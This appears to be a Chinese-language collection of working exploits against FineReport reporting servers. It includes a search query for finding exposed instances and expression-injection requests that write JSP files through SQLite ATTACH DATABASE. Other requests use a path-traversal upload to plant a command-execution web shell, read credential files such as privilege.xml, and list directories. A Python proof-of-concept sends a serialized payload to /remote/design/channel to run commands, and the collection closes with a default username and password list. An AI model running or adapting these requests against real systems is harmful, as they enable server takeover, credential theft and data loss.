1
2
3

title="数据决策系统" || body="FineReport" || body="ReportServer?op=resource"
    || body="/webroot/decision" || body="/WebReport/ReportServer?" || body="/webroot/decision/file?path="
    || body="/decision/file?path="

1
2
3
4

访问以下两个路径可查看帆软版本号

/webroot/dicision/system/info
/dicision/system/info

1
2
3

/webroot/decision/view/ReportServer?test=s&n=${ENV_HOME}

/decision/view/ReportServer?test=s&n=${ENV_HOME}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

POST /decision/ReportServer HTTP/1.1
Host: 218.90.225.215
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

op=getSessionID&viewlets=[5b]{'reportlet':'/'}[5d]&

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7B%22p%22%3A%7B%22x%22%3A2%7D%7D&__parameters__=%7B%7D HTTP/1.1
Host: 192.168.187.134:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Params: <pd>
 <LargeDatasetExcelExportJS dsName="1">
<Parameters><Parameter>
<Attributes name="p"/>
<O t="Formula"><Attributes><![CDATA[sql('FRDemo',CONCATENATE("pr","agm","a wr","i","t","a","ble","_sch","e","ma=o","n"),1)-sql('FRDemo',CONCATENATE("dele","t","e f","r","o","m sq","li","t","e_sc","he","ma w","here"," na","m","e!","=","'s","ql","ite","_s","ta","t","1'"),1)-sql('FRDemo',CONCATENATE("an","aly","ze"),1)-sql('FRDemo',CONCATENATE("re","p","lac","e i","nto"," s","ql","ite_","st","at","1 va","lu","es('","'","'<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer(\"Zjc5NjUxODQ4NDAyY2JmZmI3MWNmNGMwYWYyNzU0NzE=\"))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>", "'","',''"),"")),1)-sql('FRDemo',CONCATENATE("V","A","C","U","U","M"," i","nt","o(''",ENV_HOME,"/",".",".","/",".","/","console",".","j","s","p","')"),1)]]></Attributes></O>
</Parameter></Parameters>
</LargeDatasetExcelExportJS>
</pd>
Sessionid: 76fe07c3-6b88-4d57-8f19-d415d6db379a
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

1

/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

1
2

erick
___0022007c0039003b005100e3     //密文 明文123456

1

/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../..&currentUserName=admin&currentUserId=1&isWebReport=true

1
2
3
4
5
6
7
8
9

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 95

{"__CONTENT__":"<% out.print(\"hello\"); %>","__CHARSET__":"UTF-8"}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

xxxx/WebReport/update.jsp
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 675

{"__CONTENT__":"<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}%>","__CHARSET__":"UTF-8"}

1
2

验证脚本：判断目标是否存在表达式注入，如果返回302表示很可能存在漏洞
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFSELECT%201%3B',1,1))}

1
2
3
4
5
6
7
8

/webroot/decision/view/ReportServer?test=s&n=${ENV_HOME}   //获取绝对路径
//写入文件

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('ATTACH%09DATABASE%20%27%2Fbi%2Fxqiao_bi%2Fwebapps%2Fwebroot%2Fhelp%2Fhello.jsp%27%20AS%20xxxx%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('CREATE%09TABLE%20xxxx.exp%28data%20text%29%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('INSERT%09INTO%20xxxx.exp%28data%29%20VALUES%20%28%27%3c%25%20out.print%28%22hello%22%29%3b%25%3e%27%29%3B',1,1))} HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 600
Connection: close

1
2
3
4
5
6
7
8
9

GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B',1,1))}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B',1,1))} HTTP/1.1
Host: target.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

1
2
3
4
5
6
7
8
9

GET /decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: */*
Referer: http:///decision/view/ReportServer?test=s&n=${ENV_HOME}
sessionID: ${7*9}
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

1
2
3
4
5
6

GET /webroot/decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host: {{TARGET}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: */*
sessionID: ${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH DATABASE ''../webapps/webroot/test.txt'' AS t;CREATE TABLE t.d(data VARCHAR(255));INSERT INTO t.d(data) VALUES (''FineReport RCE Test - Success!'');'))}
Connection: close

1
2
3
4
5
6
7

POST /webroot/decision/remote/design/channel HTTP/1.1
Content-Type: application/json
Host: 
cmd: id
Connection: close

{{gzip(file(fine10.bin))}}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

import requests
import sys

# 检查参数数量
if len(sys.argv) < 3:
    print("Usage: python3 poc.py <target_url> <command> [proxy_url]")
    print("Example: python3 poc.py http://192.168.1.100 whoami http://127.0.0.1:8080")
    sys.exit(1)

url = sys.argv[1].rstrip('/')  # 自动去除末尾斜杠
cmd = sys.argv[2]

# 可选：第三个参数为代理
proxies = None
if len(sys.argv) > 3:
    proxy_url = sys.argv[3]
    proxies = {
        'http': proxy_url,
        'https': proxy_url
    }

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0',
    'cmd': cmd
}

target_url = url + "/webroot/decision/remote/design/channel"

data = b'\x1f\x8b\x08\x087@\xf9d\x00\x03fine10.bin\x00\x8dX{t\x14\xd5\x19\xff\xdd\xd9\xc7L6\x9b\xd7j\x02\x0b\x8a\x12\x11\x93h6 \nu\x83\n\t\x01V\x92\x80$BC\xb4\xe9d3IF6\xb3\xcb\xec,I\xacR\xa5\xda\xd6\x16\xed\xcb\xfa\xa0\xb6Z\xab\xa6VZ\x01i\x12E)\xb6\xf5Qk\xb5/\xfb\xf0\xd1c\xdbc\xff\xb3\xa7===\xc7Z\x94\xfe\xee\xccJ6!x\x9a\xec\xd9;\xf7\xbb\xf7\xfb\xbe{\x7f\xdfsv\xdf;\x08dm\xcc\xb9V\xdf\xa9\xc7r\x8e\x99\x8am\xb2\xcd\xb4m:\xa3W\xe6\x8c\x9cq\xc7kK\x0e\xfd\xf7\xf2\xdd\x07|P\x12\xf0g\xcd\xeb\x8cV\x84\x92\xe9\xa1\x8cn\xebN\xdavP\xd5*9\x1b$gC\xf3\tz\xe3H\x06\x80B\xc1\xe7\xa7\xed\x81\x98\x9e\xd1\x93\x83F\x8c|Ci+\x1b\xeb5tK2dcM|\x9a\xe2z\xe5v\xb1\xfb\x83\xf6\x7f\xeeR\xa0L\xd3\xb2\x03\xbb Z\xa1e\xect\xc6\xb0\x9dQ\x07\x11OkJ\xb7\x06\x1a:\x1c\xdb\xb4\x06\xa8\x91\xda\xea\xdckHr\xcc#/j\xd6\xb3F\xc2\xca\x1aV\xd6t\xcc\x9d\xc6\x94\xb2a\xdf\xd57\\\xbd\xe9\xed\x97\x15`$\xe3\xa0<\x9ds29g\x93\xa7\xc24\xb2\xc3~\xde\xc0G\x99q\x1e$\x96\xcdY\xb1\x82\x9b\x8c\xe8\xd4\x113-\xc7\xb0-=\x15\x1b\xc9\xa6\x9cd\xcc\xb1\xf5\x91X\xa71\x94I\xe9\x8e\x91Mp,\xda\xba\xf1\x19k\xdf\xa3\xcb|\x08&P\xd2cZ}\x86\xe5\xb4\xe7\x86z\r;\x81\xd2\x1e2X\xd9\x94\xe1$H\x1f\xe9F\xa8\xa7w\xd41\x92\xe9>#\xeb\xc0\xd7\xdd\xdd\xd4\x8d`O2\xa5g9\x8dt\x17\xdc\xb8Y\xd2\x1a[\x11\xe8\xb1\xf4!C\xa2\xe3oEE\xcf\xcc\x1bL7\xce\x14\xdd3\x8e\xfb\x97\xb3]E\x1b\xde\x8fV\x0e\x0c\xbc\xbe\xc2\xc5B\x1a\x8et\xa5\xbbi\xdf\xbf\xe6\xbc\x1b\xd4:\xdf\xca\x93\xcb\xde|\xf1\x83\'\x8fpy)\xfe,PG8\x1a<8\x1aR\xe9\x81\x01\x82\xed\x9enY\x83c\x8c8\xd2*\x9d\xe9\xed\x86E\x8f\xb1U\x08\x81\xf2\xa9\xf3o\xec\xbd\xd6H:*|\x02\xc1\x95\xa6e:\x97\t\xf8jj\xb7\x08\xf8\x9by{\x81\xb2V\xd32<\x9c:\xf5\xde\x94\x11F\x00\xc1\x10\xfc(\x12\x10;\x04\x96\xd5\x9cl\xffZ\x8fd\xa6\x1b\x9a\x88\xe2j\xdb\xd6G7\xba\x80p\xdd\xd0\x87\x1a\x05Tc\xc4H6\x0f\xf5\x85Q\x82p\x08\nJ\x05\xb4\x95\xc9T\xfe\x04\x0b\xa6D\xb6\xa7;r\xc9\xc1\xb5\xa6\x91\xeak\x19I\x1a\x19\xc7L[**\x04\xce\x9a\xb9\xa7\xcdp\x06\xd3\x85\x9bN\x138mjS\xc1B\xa5@\xe5\xd4B\xe7 \x0f\xd5\xb7\xceN\xe72*\xe6L[r\xad\xdb\x9a\xd6\xfb$pQ\xe1\x85\xa6\xb7d\x1b\xfd)"\xd7\xe0\x9eL\xc5|\xea*\xf4\x0bOh\xa3\x8a3\xa7\xc1\xed\x91U\x9c5\x8d\xea\xc1\xa6b\xa1@\xe9\x94\x97\xb4\x9aY\x1a\xe6\x1c\x813?\x12M\x15\xe7\n\x94t8zr{\x9b\x9eqm\xc4y2g\xdbtpO\x9f\xc0\xe95\xb5\'\x1f.\x8c\x1a\xd4\x86p6\xea\xa8w\xc0p\n\x80\x10\x88\xce\xc2\xe1.\x91\xed\x02\xd4K\xb6\x18\xb1"[s\xda\x92nV\x80\xd5L\xee\x82%r/\xc1R\xc9}!-.\xb9\xe5\x1a\xc1;\x99\x81[/\xc2\xc5\xd2\xd5\x96\xd3a\x1c\xf7\x04Y\r\x1f\xa3O\xce\xd8\xa9"N<)l\x8d\xc1\x18\xb5\x8d>\xd7(\x02\xf5\xa7\xf6\xcd\x93mHu+qi\x08\x8d\xa0\x03\x96d\rgu2id\xb3\xa6\x8b\xa7\xbff[\xed\x960Vau\x08g\xa0\x891Bm\x02\x8b\x0b\x15x\xa14MA\x9e\x14\xc6\x1a\xb4H\xc6\xb5\xbc\x08\x19\xdb\x99*f\xda$\x7f\xbc0\xd6#!\xe1\xb9\x82Je\x90hh%PIb\xac\x9b\x16\x81\x9a_\xa8\xb2yP\xb7;\x8c\x1d9\xc3J\x1a\x8d\xb5\xdb\xc2h\xc7\xc6\x10\xaa\xb1\x89\xcc\x83\x8e\x93\xd1\xb0\x99q\xed\xe86\x95j\xe8\x14\x88L\xf1n\xceY\x96t\x16\x15[\xe4\x9eA3\xbbh\x89\x86\x8f\xf3\x84\x83\xba\xd5\x972l\r\xdb\x08\x049;r\xccVn\xf2\x0b\xe3ji\x91F\\C\x96\x81T\xbaWOi\xe8\x11\x08\xb1\x1cH\xb0\xd26\r\xa4\x0b\xaf:\xb9\x89$\x11F\x12}\xc5X\x04\xce+k\x12\xa7@g@\xee\x18$\x87m\xec\xd0p\xad@1\xf5n6\xb2\x19\xd6(CCJ\xa0\x88\x04/\xc2\x05V\xcdb\xd7\x93\x93\xf2l\x96\xf6$P\xa5\x85\xb4\xbc\x07\x1d}\xee\xa9v\xa9\xa0#\x07Mk\'s\xa7\xc0%\xb3\x98\xba\xfb\xff\xb4\xbe\x83\\\x08Y\xec\xf4n\xb1\xde\x90\x81\xa0a\x84\xb85\xb7\xad\xe9Y\xdf\xb2zM\x0b\xed4K!\r\xe3:|\xaa\x88\xe9\xf1z\x9a\xc5\xcc\xb6\x0ce\x9cQ\x17V\x9az\x17>-M}#\x85\xd2Y\x19\xffN\x8e\xe0\xef\x16\xa8\x98\x12\x93`d\x0e\xc8\xdcu3m\xd2\xd9\xb5\xa9\x85\xab\xb3\x84\xd9g\xf1\xb9"\xdc\x82\xcfK?OH?\x0f\xe0\x0b!\x12\xbe\x18F\xb1\x97\x9eo\x13XTPs\x9d\xf4PRw\xbc\x1e\xa57\xd7\x1f\x93\x89\xa9y0gm\xd7\xf0%\x9e\xb4?m{.~\xe9,\x86\xdav\x8a\xc40[\xfc\x7f\x05_\x95V\xfa\x1a\xfd\xc12\x86\xd9;8:=}f\xe8\x9c\xc0\xf9\xeb\xb8Sn\xbf\x8b\x01CH\xe4\xa1\x88\xc8=B\xd6O\x15\xdf\xe0\xdd\x0bR\x84g\xe30\xbe\xe99\xc2\xb7\xa8\xc2I\x9fH\xb0\x12\x89\xda\xee\xa60\xee\xc7\xb7CX\x8c\x07x\xab\x9dz*gl\xec\x17\xa8\x9a\xee\xc6y\x90\xa9\xffA<$a{\x98\x9b\xfb\xd2[\xd9\xb8\xd1u\xbf\x9b/B1\xcbL\xbb85\xe5\xfa\xfb\xa5\xf9\xbfG\x1d\xc3\xb6\xce\x18\xdd7\xa3v\xe4\x81R\xf1\x83\x0f\x0b\x18s\x7f\xc2*\xc8\xf8\xfb\xa9!\x9d\x8d\xc9\x96C\xc3\xc1\xe9\xb5d4\xeb\x18\xdcr\xc8\x8b\xa1|\xab1:#W\xcd\x92\x0cO\xb8\xdc8&B\xf8!&]DZ\xd3\xc3\x86-\x1b\xb70\x9e\x94\x89\xa9\x1a\x87\xe9\x80\xc3\xa6\xa5\xe1i>$\x87\xfa4\xfc\x88\x0870Q=CWl\xe85\xad\x86^=;\xa8\xe1\'$\xd7\x93\xfc\xec4\x97d\xdaq\xcc!f\x9d\xe7\xe9\xfe2\xc8\xbd\xb9L\x0e\x85\xa7\xc9\x93y\x9c\x9f\xe1\xc5\x10^\xc0\xcf\x05jjfA\xa9\x90i\x93\x97\x85\xc8\xd4\x8a_H\xa6\x97\xa7\xa9\xce/\xab\xf8\xa5W\xef\n ei\xaf\x99\xeaZ\n\x16(\xeb\xd7\xf8M\x08\xbf\xc2o\xa5\x1f\xb0\xe9\t\x0cK\xc3\xd2\x005\xddM\t7Z~\x8f?\xc8\xb5?\xd2\xa0^\xb5\rpIf\xbe\xd7\xf1F\x08\x07\xf0&o\xda\x91\xce\xd9Ic\xad)\x8bIY\xa7\x1b>-\xc9\xc1tL\xaa\xc4BF\x98lq\x89\x9f\x0cx>\xf9\xf9\xcc>\x8b\xdf*ggr\x14\x1c\x03u\x13\x08\x1dp7j\xfc\x0e\xba\xc4 \x99\x18\xa5\xf9\xad\x15\'\xb6N\xa2l\xbf\xdbXj(\xffP\x92\xff\x10g\x15l*\x9f\x8a\x1c}\x1c7\xf8\x1a\'q\xfe8\x1aZ\xddaY\x1b\xbfVD.\x19\xc7\xe5\xed\xf5\xfeq4\xd7s\xbe\xee(\x16\xf0\x13\xf7\xfb\x96\x07*\x03Q\xff\x91\x07\x94]Q\x7fe\xe0\xc2x0\x1a|\x1e\xc11\xc5\x8c\x06\xc7\xb1!\xaeF\xd5H\xdb8\xae\xdc\x8b\x12>u\xb8O\\\xdd WWD\xae\x9a\x12*\t\xeb\xe2ZT{\x06[\xdd-5QMn\xe9*\xd8\xa2\xe5\xb7Hz\xb7\xa4\x8f\xa1*^\xe4\xce\xc7\xf1\t~<\xea\xc9\xbb\xe5\xd2\'=\x86\xf2<\x837\x9fEp\xef\x0c\xfaQ,\xe2\'^\xe4[\x1e\xaa\x0cE\x8b\x9e\x00C\xfd\x01\xb1+ZT\x19z\x02\xa6\x82xq\xb4X\xf2m/\xe0+\x96\xf2\xc2\xd1\xb0\xa4\x0f\xf9\x9eF\xe38vD\xc3|\xe0\xf2p\xbc\xc4[\x18\xf5s\xa1\xcb\x17\xa9\xeepW9\xf3w\xf9\x0e\xe2\x06N\x87\x8f\xa2ZB\xf7\x9c(\x8a\xaa\xe3\xb8i\xaf\x10\xd1\x12\xc9\xf3\x19\x8f\xe7 nu\x99J<\xa6\xc3\xb8\xa5\xab\x02/L`\x8f\xe4\xdd\x1aU\'q{\xbc4\xf2e\xdf\x05\x93\xb8#^\x16-\x1b\xc7\xdd\xbc^Ydo\xd0SyoG\x97_\xca\xe8\nx\x92\xee\x8bjAWR\xb4t\x1c\xdf\xe1\xa2\x94\xe8\x93\xf2\xba\x02.\xe9\xc8$\xc6<\xd9\xee1\x1e\xf1\x8e\x11-+<ETsw\x8c\xa1#^\x16y\xd4\xd3]\x1e-\x8f|\xdf\xff\xa1R\xa9\xa8\xdc_\xa0H\xa2\xa1M\x17Y>\x8bH\x7f\xe3\xbc{\xe8\x12(\xba9$\xc6>\xb8\xde\x9b\x94\x8e!\x10\x0f\xde\x1c\x10c\xef\xdf8\x06\xff\x86\x03\xf4\xe1\x07\xf1\x18\x0e"\xc2\xd8|\x0b\x7fED\xbc\xa44+kq:;\xb8\xf5\xcac\xa8\xc2\x06\xf4\xbb\xa3\x89[\xddq\x8f\xf2\x88;\x06\x94\t\xe5I\x8e\x8a\x1b@\xef\xe12FY\x98\x91Q\x82R\xfeW\xa2\x0cg1Z\x161F\x96R\xfaJJl&u\x0396c\x0e\xa5\xcde-\x8fb\x14\xf3p\x13\xe6c\x0f[\xba\xbb\x18\x9d\xf7b\x01Ot6\xcft\x0eO\xb5\x10\x87\x98&\x9f\xa5\x94\x17q.Ox\x1e\xcfX\xc7S\xd6\xe0m\xd4\xe2\x1f8\x1f\xfff\x07\xfd>\xea\x85\xc6\x16\xba\x04\rb>\x96\x88:,\x15\x17\xb3)^\x85e\xa2\x05\x17\x896\\,\xfa\xd9\xf9\xde\x86\x15b/\x9b\xdegq\x89x\t\x8d\xe2U\xac\x14o\xe0Re!.S\x9a!o}\xb9\xb2\x1e\xab\x94+\xb1Zq\xd0\xa4\xdc\x895\xca\xddX\xab\xdc\x87%\xcaCDc\x1f\xae\xe0\xcd\x13\xca\x01D\x94\t\xb4\xf3\xf6m\xcaal\xe4\xa9\x80\x87Qy\x9c=vP\xa8\x98\xabb\x9e\x8a3T,`\xf68\x86*\x15g\x1f\x93\x94j\xe5\x18\xaaU\xb6\xa2*"\x91k\xf8\x15\xe6\xc1U,\x12\xc7\xc5y(\x9b\xceH\x1e\xd5\xdd,\xd7\xdd\xc1\xfb,\x06g\xa7\x1f\xc3F\xce\xfe\x03\x11|\x17\x81\xe0q\x9a`\xa6^N\xab\x8e\xc9o\xff{\x08\xc8\rpI`\x82+9\x91\xe0\xfe\xc2\xdc(\xc7=u\xe2!\x84\xea\x183\xae\x93\xec\x14\xad\x91\xc7\'\xf1\xc48\x9e\x8a\x1ca\xf2\xb9\x07Q:z5\xbd\xf1(\xbd<\xf2c\xfaw]G+\xd3H\x9e\xfaSI}\xce\xa3N\xe2%f\xbaW\xc6\xf1j\xdba,\xee\x9a\xc0\xef\xda}\xcb\xfd\x15~<\xa5\xc5\x03c\x08\xd7G\x03\xbeJ\x06\xf4k\x17D\x03\xe3\xf8S\xd7r\xbfr\xff\xf1w\xea\xf7\x8fA\x8bS\xb5O\xecwS\xeen\x96\xfe*>IdW\xa2(L\xe4\xce\xe35"P\\T\x1e\x03\x8e\xd3\xbb\x82\xdeD\xc5\x01\x02\xc3\xeb\xdd\xcb\x04}\x9c\xbe\xc7\xc7j\x80}J\x15+AN\xfe\x90P\xce\xeb\xfb\xf3\xaf\xf9\x17\xc97\xde\xc2\xd7|\xaf\x03k\x90?\xcc\xb0\xa6\xd8\xde\x1b\xa3\xd7\x08u\x8ef\x8c\x8fx\xcd\x9f^\x8a\xa6X\xdcRD\xa6\xaca\x9bzj\x8bag\xf9\xae|Ub\r\xedrE`\xc7\xdf\xcc\xbf\xaf\x1cZ7\x97/\x04|\xdd\x93m\x98\xb3E\xb6C3~5\x08\xd3L%\xf2\x8d\xad4\xff\xfbAAi\x9bG\xb3i\x1c\x8b\xe5\x8f\x1a4\xa9\xacS\xf2\xf5_\xc8\x8b\x16\xd4\xad\t\x94\x1dp\xeb\x96\xac\x80rk0\xe3@\xe8\x99a\x81\x11\tK\xc9\xc8\xff\x00\xdc\x95|\xf4(\x13\x00\x00'

# 发送请求
try:
    resp = requests.post(
        target_url,
        data=data,
        headers=headers,
        proxies=proxies,
        verify=False,  # 忽略 SSL 警告
        timeout=15
    )
    print(resp.text)
except Exception as e:
    print(f"[ERROR] {e}")

1
2
3
4

Abby、Anna、Alice、Ben、Billy、Cherry、demo、eoco、hanwen、
Jack、Jenny、Lily、Lisa、Mike、sunlin、Tom、wangwei、zhangshan、erick

password：1/123456